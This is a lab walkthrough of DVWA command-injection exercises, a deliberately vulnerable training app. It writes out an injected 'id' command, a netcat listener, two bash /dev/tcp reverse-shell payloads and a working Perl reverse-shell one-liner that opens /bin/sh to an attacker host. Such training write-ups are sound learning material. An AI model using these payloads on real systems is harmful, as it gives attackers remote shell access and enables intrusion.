DVWA Exercises 2

03. Command Injection

Let's try to ping our host

172.17.0.1

Lets try to inject another command

172.17.0.1; id

04. Command Injection Reverse Shell

Let's search for a nice cheat sheet:

PayloadsAllTheThings/Methodology and Resources/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

As you can see we get different payloads here. Let's try a bash reverse shell first:

Setup a netcat listener on port 8001

nc -lvnp 8001

Attack payload for bash TCP:

; bash -i >& /dev/tcp/172.17.0.1/8001 0>&1
; /bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1

Both didn't work! I can't see any incoming connection on my netcat listener...

Let's try another one with perl:

perl -e 'use Socket;$i="172.17.0.1";$p=8001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And we have a reverseshell :)

PreviousDVWA Exercises 1 NextDVWA Exercises 3

Last updated 4 years ago

hashtag03. Command Injection

hashtag04. Command Injection Reverse Shell

03. Command Injection

04. Command Injection Reverse Shell